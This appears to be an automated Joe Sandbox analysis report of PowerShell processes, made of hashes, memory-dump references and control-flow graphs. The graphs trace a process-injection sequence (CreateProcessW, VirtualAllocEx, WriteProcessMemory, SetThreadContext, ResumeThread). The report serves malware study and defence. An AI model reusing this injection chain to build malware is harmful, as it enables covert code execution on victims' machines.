                                                                                                                      • Instruction ID: 0e367bf16a314db37ec8ad90d2d6239fbd44da71ba50365db444b407ddc7f9ea
                                                                                                                      • Opcode Fuzzy Hash: ec693c5980ad0f56d93fc7f95b765c4b52285ba76bfe549c57b340b4571178d8
                                                                                                                      • Instruction Fuzzy Hash: 88D134B1724397EFCB158A68881076ABBF6AFD6720F1480BBD505CF282DB318991C791
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2086295475.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_72a0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $]q$$]q$$]q$$]q
                                                                                                                      • API String ID: 0-858218434
                                                                                                                      • Opcode ID: a2c831e1d4ffc110f99a8d92a86590a6d8f77a83b3232ca0c002778da0669caa
                                                                                                                      • Instruction ID: 843fee6ac2f7e38d5259815de63ba206016d450cf98fd91c6051aa9436eada5c
                                                                                                                      • Opcode Fuzzy Hash: a2c831e1d4ffc110f99a8d92a86590a6d8f77a83b3232ca0c002778da0669caa
                                                                                                                      • Instruction Fuzzy Hash: 38210BB17343177BDB34956E8841B6BBBDA9BC5B10F24843A9945CB383DE72DC818361
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2086295475.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_72a0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4']q$4']q$$]q$$]q
                                                                                                                      • API String ID: 0-978391646
                                                                                                                      • Opcode ID: 234302b546cb6593258cddc8a903acbf20bab3bccd91107d598185d130b3a1d0
                                                                                                                      • Instruction ID: 99a4e1a66169619cef8e4a40da86e0f21a0dcc6c9106748d9f7584b3ca7759e4
                                                                                                                      • Opcode Fuzzy Hash: 234302b546cb6593258cddc8a903acbf20bab3bccd91107d598185d130b3a1d0
                                                                                                                      • Instruction Fuzzy Hash: B601A2A1729386AFC73A162808600696FB25F87A2072A41D7C081DF297DA684D468397
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.2703204649.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_301d000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bad059e9be7e7292e384db8097a7cb72ff1b6ab3872ae6bb30058a7c13be8aa6
                                                                                                                      • Instruction ID: fbfd396f83a0cae7dff34b82bc2d03d06a65de96b4f854d400b7fc374b09598f
                                                                                                                      • Opcode Fuzzy Hash: bad059e9be7e7292e384db8097a7cb72ff1b6ab3872ae6bb30058a7c13be8aa6
                                                                                                                      • Instruction Fuzzy Hash: 4001A271406340AEE751CA29DDC4B7BFFD8DF41364F1CC85AED480A246C7799856C6B1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.2703204649.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_301d000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f67938adcce8ee8cb02ba57e1758412d60185aefc3be8b51318a4f297c9d6a91
                                                                                                                      • Instruction ID: aebd837e0ec13f5f6c326304d1407973175e998253537d079849deda9c4ce4e1
                                                                                                                      • Opcode Fuzzy Hash: f67938adcce8ee8cb02ba57e1758412d60185aefc3be8b51318a4f297c9d6a91
                                                                                                                      • Instruction Fuzzy Hash: 9A01407140E3C05ED7128B258C94B66BFB4DF43224F1D80DBD9888F1A7C2699849C772
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.2704473073.0000000003090000.00000040.00000800.00020000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_3090000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5e8d555fb404b1396c84b131a8b0272deb440ad5c4d5807df5a34d09b9e94171
                                                                                                                      • Instruction ID: 306a2848954e5ad7d84b566d7416db8ac389b6168ca3cf8e73a308d1564b51bd
                                                                                                                      • Opcode Fuzzy Hash: 5e8d555fb404b1396c84b131a8b0272deb440ad5c4d5807df5a34d09b9e94171
                                                                                                                      • Instruction Fuzzy Hash: E6F03A35A001049FCB04CF9DD890AEEF7B1FF88324F248199E515A72A0C336AC52CB50

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:4%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:88.5%
                                                                                                                      Total number of Nodes:26
                                                                                                                      Total number of Limit Nodes:1
                                                                                                                      execution_graph 10561 80a8c0 10562 80a93d 10561->10562 10571 80afc4 10562->10571 10585 809414 10562->10585 10564 80b1a5 CreateProcessW 10567 80b219 10564->10567 10565 80a9c8 10566 809420 Wow64SetThreadContext 10565->10566 10565->10571 10568 80aa33 10566->10568 10569 80ab46 VirtualAllocEx 10568->10569 10568->10571 10575 80aeb8 10568->10575 10570 80ab93 10569->10570 10570->10571 10572 80abe1 VirtualAllocEx 10570->10572 10573 80ac35 10570->10573 10571->10564 10571->10575 10572->10573 10573->10571 10574 809438 WriteProcessMemory 10573->10574 10573->10575 10576 80ac7f 10574->10576 10576->10571 10576->10575 10577 80adc9 10576->10577 10584 809438 WriteProcessMemory 10576->10584 10577->10571 10578 809438 WriteProcessMemory 10577->10578 10579 80adf2 10578->10579 10579->10571 10579->10575 10580 809444 Wow64SetThreadContext 10579->10580 10581 80ae67 10580->10581 10581->10571 10582 80ae6f 10581->10582 10582->10575 10583 80ae78 ResumeThread 10582->10583 10583->10575 10584->10576 10586 80b0c0 CreateProcessW 10585->10586 10588 80b219 10586->10588

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 50 80a8c0-80a971 54 80a977-80a987 50->54 55 80b0a9-80b0b6 50->55 60 80a990 54->60 61 80a989-80a98e 54->61 58 80b0b8-80b0bc 55->58 59 80b0be 55->59 58->59 64 80b0c6-80b139 59->64 65 80b0bf-80b0c5 59->65 62 80a992-80a994 60->62 61->62 69 80a996-80a9a9 62->69 70 80a9ab-80a9ca call 809414 62->70 67 80b141-80b148 64->67 68 80b13b-80b13e 64->68 65->64 72 80b153-80b169 67->72 73 80b14a-80b150 67->73 68->67 69->70 78 80a9d3 70->78 79 80a9cc-80a9d1 70->79 76 80b174-80b217 CreateProcessW 72->76 77 80b16b-80b171 72->77 73->72 84 80b220-80b298 76->84 85 80b219-80b21f 76->85 77->76 80 80a9d5-80a9d7 78->80 79->80 82 80a9dd-80a9f2 80->82 83 80b01f-80b032 80->83 90 80a9f8-80aa1c 82->90 91 80b01a 82->91 95 80b039-80b04f 83->95 104 80b2aa-80b2b1 84->104 105 80b29a-80b2a0 84->105 85->84 90->95 100 80aa22-80aa35 call 809420 90->100 91->83 95->55 111 80b051-80b05b 95->111 107 80aa3b-80aa42 100->107 108 80afbd-80afbf 100->108 109 80b2b3-80b2c2 104->109 110 80b2c8 104->110 105->104 112 80afa3-80afb6 107->112 113 80aa48-80aa52 107->113 109->110 117 80b2c9 110->117 120 80b066-80b068 111->120 121 80b05d-80b064 111->121 112->108 113->95 114 80aa58-80aa75 113->114 114->91 119 80aa7b-80aa95 call 80942c 114->119 117->117 129 80afc4 119->129 130 80aa9b-80aaa2 119->130 122 80b06a-80b06e 120->122 121->122 124 80b070 call 80860c 122->124 125 80b075-80b082 122->125 124->125 140 80b084 125->140 141 80b089-80b0a6 125->141 134 80afcb 129->134 132 80aaa8-80aab1 130->132 133 80af89-80af9c 130->133 135 80aab3-80aaf7 132->135 136 80ab1c-80ab22 132->136 133->112 142 80afd5 134->142 145 80ab00-80ab0c 135->145 146 80aaf9-80aaff 135->146 136->91 137 80ab28-80ab38 136->137 137->91 149 80ab3e-80ab91 VirtualAllocEx 137->149 140->141 150 80afdc 142->150 145->134 148 80ab12-80ab16 145->148 146->145 148->136 151 80af6f-80af82 148->151 156 80ab93-80ab99 149->156 157 80ab9a-80abb8 149->157 153 80afe3 150->153 151->133 158 80afea 153->158 156->157 157->142 159 80abbe-80abc5 157->159 164 80aff1 158->164 162 80abcb-80abd2 159->162 163 80ac4c-80ac53 159->163 162->150 166 80abd8-80abdf 162->166 163->153 165 80ac59-80ac60 163->165 172 80affb 164->172 168 80af55-80af68 165->168 169 80ac66-80ac81 call 809438 165->169 166->163 167 80abe1-80ac33 VirtualAllocEx 166->167 170 80ac35-80ac3b 167->170 171 80ac3c-80ac46 167->171 168->151 169->158 178 80ac87-80ac8e 169->178 170->171 171->163 177 80b002 172->177 182 80b009 177->182 180 80ac94-80ac9d 178->180 181 80af3b-80af4e 178->181 180->91 183 80aca3-80aca9 180->183 181->168 186 80b013 182->186 183->91 185 80acaf-80acba 183->185 185->91 189 80acc0-80acc6 185->189 186->91 190 80adc9-80adda 189->190 191 80accc-80acd1 189->191 190->91 195 80ade0-80adf4 call 809438 190->195 191->91 192 80acd7-80acea 191->192 192->91 196 80acf0-80ad03 192->196 195->177 199 80adfa-80ae01 195->199 196->91 203 80ad09-80ad1e 196->203 201 80af07-80af1a 199->201 202 80ae07-80ae0d 199->202 217 80af21-80af34 201->217 202->91 204 80ae13-80ae24 202->204 203->164 208 80ad24-80ad28 203->208 204->182 210 80ae2a-80ae2e 204->210 211 80ad2e-80ad37 208->211 212 80adaf-80adb2 208->212 213 80ae30-80ae33 210->213 214 80ae39-80ae41 210->214 211->91 216 80ad3d-80ad40 211->216 212->91 215 80adb8-80adbb 212->215 213->214 214->91 218 80ae47-80ae51 214->218 215->91 219 80adc1-80adc3 215->219 216->91 220 80ad46-80ad76 216->220 217->181 218->95 221 80ae57-80ae69 call 809444 218->221 219->190 219->191 220->91 229 80ad7c-80ad95 call 809438 220->229 221->186 228 80ae6f-80ae76 221->228 230 80aed3-80aee6 228->230 231 80ae78-80aeb6 ResumeThread 228->231 238 80ad9a-80ad9c 229->238 235 80aeed-80af00 230->235 233 80aeb8-80aebe 231->233 234 80aebf-80aecc 231->234 233->234 234->235 236 80aece 234->236 235->201 236->140 238->172 240 80ada2-80ada9 238->240 240->212 240->217
                                                                                                                      APIs
                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 0080AB7A
                                                                                                                      • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 0080AC1C
                                                                                                                        • Part of subcall function 00809438: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18112514,00000000,?,?,?,00000000,00000000,?,0080AC7F,?,00000000,?), ref: 0080B4F4
                                                                                                                      • ResumeThread.KERNELBASE(?), ref: 0080AE9F
                                                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,72B110FC,?), ref: 0080B204
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2324005608.0000000000800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00800000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_800000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4270437565-0
                                                                                                                      • Opcode ID: 4d3d1833c34cebee1d859cbf8732dbbc2080c7f4d15628667b7f07909b6145b6
                                                                                                                      • Instruction ID: 6dc9d2b2822f046b269d81034eaa38beccfc34867b952fdf639bbc1e90f58183
                                                                                                                      • Opcode Fuzzy Hash: 4d3d1833c34cebee1d859cbf8732dbbc2080c7f4d15628667b7f07909b6145b6
                                                                                                                      • Instruction Fuzzy Hash: B8426D70A002198FDB68DF69CC54B9EB7B2FF84304F1085A9E419EB291DB749E85CF52

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 6f10b68-6f10b8e 1 6f10b94-6f10b99 0->1 2 6f10cfb-6f10d7c 0->2 3 6f10bb1-6f10bb5 1->3 4 6f10b9b-6f10ba1 1->4 41 6f10da9-6f10dae 2->41 42 6f10d7e-6f10d8c 2->42 5 6f10bbb-6f10bbd 3->5 6 6f10caa-6f10cb4 3->6 8 6f10ba3 4->8 9 6f10ba5-6f10baf 4->9 10 6f10bcd 5->10 11 6f10bbf-6f10bcb 5->11 12 6f10cc2-6f10cc8 6->12 13 6f10cb6-6f10cbf 6->13 8->3 9->3 17 6f10bcf-6f10bd1 10->17 11->17 14 6f10cca-6f10ccc 12->14 15 6f10cce-6f10cda 12->15 19 6f10cdc-6f10cf8 14->19 15->19 17->6 20 6f10bd7-6f10bd9 17->20 23 6f10be9 20->23 24 6f10bdb-6f10be7 20->24 27 6f10beb-6f10bed 23->27 24->27 27->6 28 6f10bf3-6f10bf5 27->28 31 6f10bf7-6f10bfd 28->31 32 6f10c0f-6f10c13 28->32 35 6f10c01-6f10c0d 31->35 36 6f10bff 31->36 33 6f10c15-6f10c1b 32->33 34 6f10c2d-6f10ca7 32->34 37 6f10c1d 33->37 38 6f10c1f-6f10c2b 33->38 35->32 36->32 37->34 38->34 41->42 49 6f10d94-6f10da3 42->49 49->41
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                      • API String ID: 0-3723351465
                                                                                                                      • Opcode ID: 60c3c92ae35afa49ca28d1792ee1fe382889505e05314d748c02af02320231b1
                                                                                                                      • Instruction ID: 6628c431a9e60c84f9bf1c72db2b16ff89eedde89758e4252f243895029b1db7
                                                                                                                      • Opcode Fuzzy Hash: 60c3c92ae35afa49ca28d1792ee1fe382889505e05314d748c02af02320231b1
                                                                                                                      • Instruction Fuzzy Hash: BA516731F043059FDB649B78884076ABBE6AF85750F24846BD485CF282DE31C9C5CBA2

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 244 6f122c3-6f122dc 245 6f12335 244->245 246 6f122de-6f12306 244->246 249 6f12345 245->249 250 6f12337-6f12343 245->250 247 6f124b2-6f124b9 246->247 248 6f1230c-6f12311 246->248 251 6f12313-6f12319 248->251 252 6f12329-6f1232d 248->252 253 6f12347-6f12349 249->253 250->253 254 6f1231b 251->254 255 6f1231d-6f12327 251->255 256 6f12333 252->256 257 6f1245e-6f12468 252->257 253->257 259 6f1234f-6f12353 253->259 254->252 255->252 256->245 262 6f12476-6f1247c 257->262 263 6f1246a-6f12473 257->263 260 6f12355-6f12364 259->260 261 6f12366 259->261 264 6f12368-6f1236a 260->264 261->264 266 6f12482-6f1248e 262->266 267 6f1247e-6f12480 262->267 264->257 269 6f12370-6f12372 264->269 268 6f12490-6f124af 266->268 267->268 271 6f12382 269->271 272 6f12374-6f12380 269->272 274 6f12384-6f12386 271->274 272->274 274->257 275 6f1238c-6f1238e 274->275 277 6f12390-6f12396 275->277 278 6f123a8-6f123b3 275->278 279 6f12398 277->279 280 6f1239a-6f123a6 277->280 281 6f123c2-6f123ce 278->281 282 6f123b5-6f123b8 278->282 279->278 280->278 283 6f123d0-6f123d2 281->283 284 6f123dc-6f123e3 281->284 282->281 283->284 286 6f123ea-6f123ec 284->286 287 6f12404-6f1245b 286->287 288 6f123ee-6f123f4 286->288 289 6f123f6 288->289 290 6f123f8-6f123fa 288->290 289->287 290->287
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                                                                      • API String ID: 0-2353078639
                                                                                                                      • Opcode ID: b4d21ab07e877766dc9525a897095deb28676e94a2519c0f7df62a2717da3de4
                                                                                                                      • Instruction ID: 9e47b62c6932805ef056efe6bc24457465b12b3d65ee17ca84818d3662e5f425
                                                                                                                      • Opcode Fuzzy Hash: b4d21ab07e877766dc9525a897095deb28676e94a2519c0f7df62a2717da3de4
                                                                                                                      • Instruction Fuzzy Hash: 46412731F00205CFDB698EA9C44166ABBF5BF85690F2584AAD854CF251DB31CAC2CBA1

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 292 6f103fd-6f10400 293 6f10402-6f10404 292->293 294 6f10406-6f1040e 292->294 293->294 295 6f10410-6f10416 294->295 296 6f10426-6f1042a 294->296 299 6f10418 295->299 300 6f1041a-6f10424 295->300 297 6f10430-6f10434 296->297 298 6f1058b-6f10595 296->298 301 6f10447 297->301 302 6f10436-6f10445 297->302 303 6f105a3-6f105a9 298->303 304 6f10597-6f105a0 298->304 299->296 300->296 308 6f10449-6f1044b 301->308 302->308 306 6f105ab-6f105ad 303->306 307 6f105af-6f105bb 303->307 309 6f105bd-6f105db 306->309 307->309 308->298 310 6f10451-6f10471 308->310 316 6f10490 310->316 317 6f10473-6f1048e 310->317 318 6f10492-6f10494 316->318 317->318 318->298 319 6f1049a-6f1049c 318->319 321 6f104ac 319->321 322 6f1049e-6f104aa 319->322 323 6f104ae-6f104b0 321->323 322->323 323->298 325 6f104b6-6f104d6 323->325 328 6f104d8-6f104de 325->328 329 6f104ee-6f104f2 325->329 332 6f104e0 328->332 333 6f104e2-6f104e4 328->333 330 6f104f4-6f104fa 329->330 331 6f1050c-6f10510 329->331 334 6f104fc 330->334 335 6f104fe-6f1050a 330->335 336 6f10517-6f10519 331->336 332->329 333->329 334->331 335->331 338 6f10531-6f10588 336->338 339 6f1051b-6f10521 336->339 340 6f10523 339->340 341 6f10525-6f10527 339->341 340->338 341->338
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                                                                      • API String ID: 0-2353078639
                                                                                                                      • Opcode ID: 81283524d7c1719b9891de930838f92dd092432182f2d8aeaa8c2b37ebd0fe67
                                                                                                                      • Instruction ID: f7313823292b1ac1c6316c076b9dfd3b1065755f020dd98904da8a26c1527410
                                                                                                                      • Opcode Fuzzy Hash: 81283524d7c1719b9891de930838f92dd092432182f2d8aeaa8c2b37ebd0fe67
                                                                                                                      • Instruction Fuzzy Hash: AB410632F102058FDBA84A39945127EB7D5BFA4790F20847AD842CF285DF35C9D1C7A2

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 343 80a53d-80a8b2 344 80a8b4-80a8b8 343->344 345 80a8ba 343->345 344->345 346 80a8c2-80a971 345->346 347 80a8bc-80a8c1 345->347 351 80a977-80a987 346->351 352 80b0a9-80b0b6 346->352 347->346 357 80a990 351->357 358 80a989-80a98e 351->358 355 80b0b8-80b0bc 352->355 356 80b0be 352->356 355->356 361 80b0c6-80b139 356->361 362 80b0bf-80b0c5 356->362 359 80a992-80a994 357->359 358->359 366 80a996-80a9a9 359->366 367 80a9ab-80a9ca call 809414 359->367 364 80b141-80b148 361->364 365 80b13b-80b13e 361->365 362->361 369 80b153-80b169 364->369 370 80b14a-80b150 364->370 365->364 366->367 375 80a9d3 367->375 376 80a9cc-80a9d1 367->376 373 80b174-80b217 CreateProcessW 369->373 374 80b16b-80b171 369->374 370->369 381 80b220-80b298 373->381 382 80b219-80b21f 373->382 374->373 377 80a9d5-80a9d7 375->377 376->377 379 80a9dd-80a9f2 377->379 380 80b01f-80b032 377->380 387 80a9f8-80aa1c 379->387 388 80b01a 379->388 392 80b039-80b04f 380->392 401 80b2aa-80b2b1 381->401 402 80b29a-80b2a0 381->402 382->381 387->392 397 80aa22-80aa35 call 809420 387->397 388->380 392->352 408 80b051-80b05b 392->408 404 80aa3b-80aa42 397->404 405 80afbd-80afbf 397->405 406 80b2b3-80b2c2 401->406 407 80b2c8 401->407 402->401 409 80afa3-80afb6 404->409 410 80aa48-80aa52 404->410 406->407 414 80b2c9 407->414 417 80b066-80b068 408->417 418 80b05d-80b064 408->418 409->405 410->392 411 80aa58-80aa75 410->411 411->388 416 80aa7b-80aa95 call 80942c 411->416 414->414 426 80afc4 416->426 427 80aa9b-80aaa2 416->427 419 80b06a-80b06e 417->419 418->419 421 80b070 call 80860c 419->421 422 80b075-80b082 419->422 421->422 437 80b084 422->437 438 80b089-80b0a6 422->438 431 80afcb 426->431 429 80aaa8-80aab1 427->429 430 80af89-80af9c 427->430 432 80aab3-80aaf7 429->432 433 80ab1c-80ab22 429->433 430->409 439 80afd5 431->439 442 80ab00-80ab0c 432->442 443 80aaf9-80aaff 432->443 433->388 434 80ab28-80ab38 433->434 434->388 446 80ab3e-80ab91 VirtualAllocEx 434->446 437->438 447 80afdc 439->447 442->431 445 80ab12-80ab16 442->445 443->442 445->433 448 80af6f-80af82 445->448 453 80ab93-80ab99 446->453 454 80ab9a-80abb8 446->454 450 80afe3 447->450 448->430 455 80afea 450->455 453->454 454->439 456 80abbe-80abc5 454->456 461 80aff1 455->461 459 80abcb-80abd2 456->459 460 80ac4c-80ac53 456->460 459->447 463 80abd8-80abdf 459->463 460->450 462 80ac59-80ac60 460->462 469 80affb 461->469 465 80af55-80af68 462->465 466 80ac66-80ac81 call 809438 462->466 463->460 464 80abe1-80ac33 VirtualAllocEx 463->464 467 80ac35-80ac3b 464->467 468 80ac3c-80ac46 464->468 465->448 466->455 475 80ac87-80ac8e 466->475 467->468 468->460 474 80b002 469->474 479 80b009 474->479 477 80ac94-80ac9d 475->477 478 80af3b-80af4e 475->478 477->388 480 80aca3-80aca9 477->480 478->465 483 80b013 479->483 480->388 482 80acaf-80acba 480->482 482->388 486 80acc0-80acc6 482->486 483->388 487 80adc9-80adda 486->487 488 80accc-80acd1 486->488 487->388 492 80ade0-80adf4 call 809438 487->492 488->388 489 80acd7-80acea 488->489 489->388 493 80acf0-80ad03 489->493 492->474 496 80adfa-80ae01 492->496 493->388 500 80ad09-80ad1e 493->500 498 80af07-80af1a 496->498 499 80ae07-80ae0d 496->499 514 80af21-80af34 498->514 499->388 501 80ae13-80ae24 499->501 500->461 505 80ad24-80ad28 500->505 501->479 507 80ae2a-80ae2e 501->507 508 80ad2e-80ad37 505->508 509 80adaf-80adb2 505->509 510 80ae30-80ae33 507->510 511 80ae39-80ae41 507->511 508->388 513 80ad3d-80ad40 508->513 509->388 512 80adb8-80adbb 509->512 510->511 511->388 515 80ae47-80ae51 511->515 512->388 516 80adc1-80adc3 512->516 513->388 517 80ad46-80ad76 513->517 514->478 515->392 518 80ae57-80ae69 call 809444 515->518 516->487 516->488 517->388 526 80ad7c-80ad9c call 809438 517->526 518->483 525 80ae6f-80ae76 518->525 527 80aed3-80aee6 525->527 528 80ae78-80aeb6 ResumeThread 525->528 526->469 537 80ada2-80ada9 526->537 532 80aeed-80af00 527->532 530 80aeb8-80aebe 528->530 531 80aebf-80aecc 528->531 530->531 531->532 533 80aece 531->533 532->498 533->437 537->509 537->514
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2324005608.0000000000800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00800000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_800000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e63ccb1763b987eba4e1332de5b9be7d4f63bf7e1c857770e710745b4da20da0
                                                                                                                      • Instruction ID: 1ead7bc4f20fd7feeea78aac5272d7281d43a1a89966d63edc327be998570f6f
                                                                                                                      • Opcode Fuzzy Hash: e63ccb1763b987eba4e1332de5b9be7d4f63bf7e1c857770e710745b4da20da0
                                                                                                                      • Instruction Fuzzy Hash: 59F15A70A00319CFEB68CB25CC54B9AB7B6FF84304F1481A9E559EB291DB709E85CF52

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 541 6f132f4-6f132f7 542 6f132f9-6f132fb 541->542 543 6f132fd-6f13305 541->543 542->543 544 6f13307-6f1330d 543->544 545 6f1331d-6f13321 543->545 546 6f13311-6f1331b 544->546 547 6f1330f 544->547 548 6f13327-6f1332b 545->548 549 6f1344c-6f13456 545->549 546->545 547->545 550 6f1336b 548->550 551 6f1332d-6f1333e 548->551 552 6f13464-6f1346a 549->552 553 6f13458-6f13461 549->553 556 6f1336d-6f1336f 550->556 561 6f134a4-6f134ad 551->561 562 6f13344-6f13349 551->562 554 6f13470-6f1347c 552->554 555 6f1346c-6f1346e 552->555 559 6f1347e-6f134a1 554->559 555->559 556->549 560 6f13375-6f13379 556->560 560->549 564 6f1337f-6f13383 560->564 565 6f13361-6f13369 562->565 566 6f1334b-6f13351 562->566 564->549 568 6f13389-6f133af 564->568 565->556 569 6f13353 566->569 570 6f13355-6f1335f 566->570 568->549 576 6f133b5-6f133b9 568->576 569->565 570->565 577 6f133bb-6f133c4 576->577 578 6f133dc 576->578 579 6f133c6-6f133c9 577->579 580 6f133cb-6f133d8 577->580 581 6f133df-6f133ec 578->581 582 6f133da 579->582 580->582 584 6f133f2-6f13449 581->584 582->581
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (o]q$(o]q
                                                                                                                      • API String ID: 0-1858875562
                                                                                                                      • Opcode ID: 38f23a919de432bdd5a3b2f4a75296d51ecfed31da5bf7a10ba04eff5674da3d
                                                                                                                      • Instruction ID: 12e03b1ba12630cab9cea2b27d6d9f068214a3d5ad0c31e7325ad90a79a5803d
                                                                                                                      • Opcode Fuzzy Hash: 38f23a919de432bdd5a3b2f4a75296d51ecfed31da5bf7a10ba04eff5674da3d
                                                                                                                      • Instruction Fuzzy Hash: AB412973F00209DFDF699F68C8457AEB7A2FB84750F14846AE5114F191CB32D892CB95

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 586 6f1061b-6f10620 587 6f10622-6f10624 586->587 588 6f10626-6f1062e 586->588 587->588 589 6f10630-6f10636 588->589 590 6f10646-6f1064a 588->590 591 6f10638 589->591 592 6f1063a-6f10644 589->592 593 6f10650-6f10652 590->593 594 6f10727-6f10731 590->594 591->590 592->590 597 6f10662 593->597 598 6f10654-6f10660 593->598 595 6f10733-6f1073c 594->595 596 6f1073f-6f10745 594->596 600 6f10747-6f10749 596->600 601 6f1074b-6f10757 596->601 599 6f10664-6f10666 597->599 598->599 599->594 603 6f1066c-6f10670 599->603 604 6f10759-6f10777 600->604 601->604 605 6f10690 603->605 606 6f10672-6f1068e 603->606 608 6f10692-6f10694 605->608 606->608 608->594 611 6f1069a-6f106ad 608->611 615 6f106b3-6f106b5 611->615 616 6f106b7-6f106bd 615->616 617 6f106cd-6f10724 615->617 618 6f106c1-6f106c3 616->618 619 6f106bf 616->619 618->617 619->617
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4']q$4']q
                                                                                                                      • API String ID: 0-3120983240
                                                                                                                      • Opcode ID: d41620127c360af49f7fe9138e38d4f0b86c6b7fb6ddeae712021d496fd5e17a
                                                                                                                      • Instruction ID: b6dbdb941da53f8ba780e2442ef0f94cc16ba863ce94c042a18a43eb6f3ad4aa
                                                                                                                      • Opcode Fuzzy Hash: d41620127c360af49f7fe9138e38d4f0b86c6b7fb6ddeae712021d496fd5e17a
